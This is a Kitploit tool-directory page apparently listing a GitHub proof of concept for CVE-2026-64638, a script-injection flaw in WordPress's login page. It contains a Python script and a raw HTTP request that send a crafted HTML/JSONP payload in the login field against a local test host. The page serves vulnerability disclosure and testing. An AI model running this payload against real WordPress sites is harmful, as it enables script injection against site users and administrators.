Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-64638 — CVE-2026-64638 | Kitploit
Tools/GitHubGitHub/5yu4n/cve-2026-64638
Vulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHub5yu4n/cve-2026-64638

CVE-2026-64638

CVE-2026-64638

View Repository
11 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-64638

CVE-2026-64638

fast try

root@kitploit:~
import requests

target = "http://127.0.0.1:9000/wp-login.php"
payload = '< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=alert>< div id=color-picker class=reset-pass-submit>< button class="wp-generate-pw color-option">X'
response = requests.post(target, data={"log": payload, "pwd": "x"}, timeout=5)
print(response.status_code)
print(response.text)

or

root@kitploit:~
POST /wp-login.php HTTP/1.1
Host: 127.0.0.1:9000
Content-Type: application/x-www-form-urlencoded
User-Agent: python-requests
Accept: */*
Connection: close

log=%3C+area+id%3Dajaxurl+href%3D%2F%3Frest_route%3D%2F%26_method%3DGET%26_jsonp%3Dalert%3E%3C+div+id%3Dcolor-picker+class%3Dreset-pass-submit%3E%3C+button+class%3D%22wp-generate-pw+color-option%22%3EX&pwd=x
Download Tool